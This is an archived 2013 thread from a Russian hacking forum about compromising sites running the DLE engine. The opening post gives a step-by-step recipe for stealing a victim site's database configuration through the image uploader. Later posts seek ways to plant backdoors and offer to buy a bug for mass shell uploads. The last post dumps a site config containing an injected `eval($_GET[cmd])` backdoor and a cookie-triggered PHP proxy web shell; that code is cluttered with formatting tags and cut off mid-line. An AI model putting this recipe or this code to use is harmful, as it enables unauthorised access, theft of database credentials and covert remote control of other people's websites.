ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.04.2013, 13:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
379
Репутация:
0
|
|
Сообщение от sanchez
sanchez said:
Вроде бы еще не было так что извеняюсь если повторюсь!
Взлом сайта на DLE версии ниже 9.0, инструкция (Работаем через браузер Opera 10).
1. Заходим на сайт жертвы
2. Регистрируемся и авторизуемся на сайте
3. Переходим по ссылке _http://site.ru/engine/images.php (где site.ru - адрес жертвы)
4. Открываем исходный код открытой нами страницы и после:
(строка может немного отличаться и повторяться 2 раза, вставляем после 1й)
Нажимаем в браузере, под вкладками Применить изменения
5. После этих действий необходимо проверить работоспособность дырки, для этого на странице http://site.ru/engine/images.php, чей исходный код мы редактировали пунктом выше, нажимаем Загрузить. В списке загруженных файлов должен появиться dbconfig.php, мы можем продолжить...
Что бы скачать файл конфига мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:
[download]
[/HTML]
и скачиваем файл dbconfig.php с данными для входа в phpMyAdmin, адрес которой обычно site.ru/phpmyadmin/ или site.ru/myadmin/
ИсточникВсе проделываю, но при нажатии на кнопку загрузки, выдает сообщение "Невозможно создать директорию /uploads/posts/2013-04/".
Это можно как-то обойти? Или пока админ фотку на загрузит в этом месяце и в этом году - не получится?
|
|
|
|
04.05.2013, 22:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Есть админ акк, dle нулл с затертой версией, но это 9,6-9,7. Есть возможность залиться или оставить бекдор?)
|
|
|
|
04.05.2013, 23:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Сообщение от justonline
justonline said:
Есть админ акк, dle нулл с затертой версией, но это 9,6-9,7. Есть возможность залиться или оставить бекдор?)
Есть, способ известен давно, работает под все версии.
Недавно его "переоткрыли" еще несколько человек, независимо друг от друга, но в паблик выкладывать пока не собираются.
Исходники открыты, можно поковырять самому, способ не сложный.
|
|
|
11.05.2013, 10:47
|
|
Новичок
Регистрация: 23.03.2007
Сообщений: 2
Провел на форуме:
55028
Репутация:
7
|
|
Сообщение от vadim3553
vadim3553 said:
Все проделываю, но при нажатии на кнопку загрузки, выдает сообщение "Невозможно создать директорию /uploads/posts/2013-04/".
Это можно как-то обойти? Или пока админ фотку на загрузит в этом месяце и в этом году - не получится?
Уязвимость не актуальна уже давным-давно. Все сайты с ней уже пофиксили. Версия в которую вы хотите залить - фикс. Можно даже не пытаться
|
|
|
|
03.06.2013, 00:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
30137
Репутация:
48
|
|
Сообщение от Scraid
Scraid said:
Уязвимость не актуальна уже давным-давно. Все сайты с ней уже пофиксили. Версия в которую вы хотите залить - фикс. Можно даже не пытаться
хмм, а возможно ли автоматизировать эту уязвимость для заливки шеллов автоматически? Если да, то готов купить данный баг ...
|
|
|
|
03.06.2013, 19:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Здравствуйте, есть дле сайт, при заходе на главнуюю выводит такое
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]recourse[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]request[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sad[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tongue[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]wassat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]crying[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]what[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]bully[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]angry[/COLOR][COLOR="#DD0000"]", 'timestamp_active' => "[/COLOR][COLOR="#0000BB"]j F Y[/COLOR][COLOR="#DD0000"]", 'news_sort' => "[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#DD0000"]", 'news_msort' => "[/COLOR][COLOR="#0000BB"]DESC[/COLOR][COLOR="#DD0000"]", 'catalog_sort' => "[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#DD0000"]", 'catalog_msort' => "[/COLOR][COLOR="#0000BB"]DESC[/COLOR][COLOR="#DD0000"]", 'image_align' => "[/COLOR][COLOR="#0000BB"]left[/COLOR][COLOR="#DD0000"]", 'mail_news' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'show_sub_cats' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'short_rating' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'hide_full_link' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'allow_search_print' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_add_tags' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_site_wysiwyg' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'allow_quick_wysiwyg' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_comments' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'comments_maxlen' => "[/COLOR][COLOR="#0000BB"]3000[/COLOR][COLOR="#DD0000"]", 'comm_nummers' => "[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#DD0000"]", 'comm_msort' => "[/COLOR][COLOR="#0000BB"]ASC[/COLOR][COLOR="#DD0000"]", 'flood_time' => "[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#DD0000"]", 'auto_wrap' => "[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#DD0000"]", 'timestamp_comment' => "[/COLOR][COLOR="#0000BB"]j F Y H[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#DD0000"]", 'allow_search_link' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'mail_comments' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_comments_wysiwyg' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'full_search' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_registration' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'allow_cache' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'allow_multi_category' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'related_news' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'no_date' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_fixed' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'speedbar' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_banner' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_cmod' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_votes' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'allow_topnews' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'allow_read_count' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'cache_count' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_calendar' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'allow_archives' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'rss_informer' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_tags' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_change_sort' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'ajax' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'files_allow' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'files_type' => "[/COLOR][COLOR="#0000BB"]zip[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]rar[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]exe[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]doc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pdf[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]swf[/COLOR][COLOR="#DD0000"]", 'max_file_size' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'max_file_count' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'files_force' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'files_max_speed' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'files_antileech' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'files_count' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'admin_mail' => "[/COLOR][COLOR="#0000BB"]admin[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#DD0000"]", 'mail_metod' => "[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#DD0000"]", 'smtp_host' => "[/COLOR][COLOR="#0000BB"]localhost[/COLOR][COLOR="#DD0000"]", 'smtp_port' => "[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#DD0000"]", 'smtp_user' => "", 'smtp_pass' => "", 'mail_bcc' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'reg_group' => "[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#DD0000"]", 'registration_type' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'registration_rules' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_sec_code' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'allow_skin_change' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'mail_pm' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'max_users' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'max_users_day' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'max_up_side' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'max_up_size' => "[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#DD0000"]", 'max_image_days' => "[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#DD0000"]", 'allow_watermark' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'max_watermark' => "[/COLOR][COLOR="#0000BB"]150[/COLOR][COLOR="#DD0000"]", 'max_image' => "[/COLOR][COLOR="#0000BB"]450[/COLOR][COLOR="#DD0000"]", 'jpeg_quality' => "[/COLOR][COLOR="#0000BB"]85[/COLOR][COLOR="#DD0000"]", 'tag_img_width' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'flv_watermark' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_smartphone' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_smart_images' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_smart_video' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_smart_format' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_rss' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'rss_mtype' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'rss_number' => "[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#DD0000"]", 'rss_format' => "[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#DD0000"]", 'version_id' => "[/COLOR][COLOR="#0000BB"]8.0[/COLOR][COLOR="#DD0000"]", 'allow_upload' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'news_captcha' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'lang_GlassyEvolution' => "[/COLOR][COLOR="#007700"]{${@eval([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]cmd[/COLOR][COLOR="#007700"]])}}[/COLOR][COLOR="#DD0000"]", if (isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'_rpx'])) { define('vpsp_version', '2.5.0'); define('vpsp_pwd', '12345678'); define('vpsp_enc_key', '12345678password'); error_reporting(~E_ALL); @set_time_limit(0); ob_implicit_flush(1); ignore_user_abort(0); header('Content-type: application/octet-stream'); header('Content-Transfer-Encoding: binary'); header('X-VPSP-VERSION: ' . vpsp_version);[/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"]= fopen('php://input', 'r'); define('vpsp_enc', ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) != 0);[/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]; if (vpsp_enc) { if (isset([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_pe']) == false) {[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_ks'] = VC_GenerateKeyHash(vpsp_enc_key);[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_pe'] = VC_Init(vpsp_enc_key,[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_ks']); }[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_pd'] = array_flip([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_pe']);[/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]= VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 2)); if ([/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]!= 'OK') { header('X-VPSP-ERROR: bad_enc_key'); header('X-VPSP-HOST: ' . (isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTPS']) ? 'https://' : 'http://') .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'] .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI']); exit; }[/COLOR][COLOR="#0000BB"]$rBuffLen[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$sBuffLen[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$reqPwd[/COLOR][COLOR="#DD0000"]= ([/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]> 0) ? VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"])) : '';[/COLOR][COLOR="#0000BB"]$https[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]= VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)))));[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))); } else {[/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]= fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 2); if ([/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]!= 'OK') { header('X-VPSP-ERROR: bad_request'); header('X-VPSP-HOST: ' . (isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTPS']) ? 'https://' : 'http://') .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'] .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI']); exit; }[/COLOR][COLOR="#0000BB"]$rBuffLen[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 * 256 * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1));[/COLOR][COLOR="#0000BB"]$sBuffLen[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 * 256 * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1));[/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1));[/COLOR][COLOR="#0000BB"]$reqPwd[/COLOR][COLOR="#DD0000"]= ([/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]> 0) ? fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]) : '';[/COLOR][COLOR="#0000BB"]$https[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1));[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]= fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)); } if ([/COLOR][COLOR="#0000BB"]$reqPwd[/COLOR][COLOR="#DD0000"]!== vpsp_pwd) {[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]= "[/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.0 401 Unauthorized[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VERSION[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . vpsp_version . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]bad_password[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]HOST[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . (isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTPS']) ? 'https://' : 'http://') .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'] .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'] . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nConnection[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]close[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]"; if (vpsp_enc) { echo VC_Encrypt([/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]); } else { echo[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]; } exit; } if ([/COLOR][COLOR="#0000BB"]$https[/COLOR][COLOR="#DD0000"]== 1) {[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]= 'ssl://' .[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]; }[/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]= fsockopen([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$errno[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$errstr[/COLOR][COLOR="#DD0000"], 20); if ([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]== false) {[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]= "[/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.0 503 Service Unavailable[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VERSION[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . vpsp_version . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]host_down[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]TEXT[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . base64_encode([/COLOR][COLOR="#0000BB"]$errstr[/COLOR][COLOR="#DD0000"]) ."[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]HOST[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . (isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTPS']) ? 'https://' : 'http://') .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'] .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'] . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]TARGET[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . str_replace('ssl://', '',[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]) . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nConnection[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]close[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]"; if (vpsp_enc) { echo VC_Encrypt([/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]); } else { echo[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]; } exit; } while ([/COLOR][COLOR="#0000BB"]$wbuffer[/COLOR][COLOR="#DD0000"]= 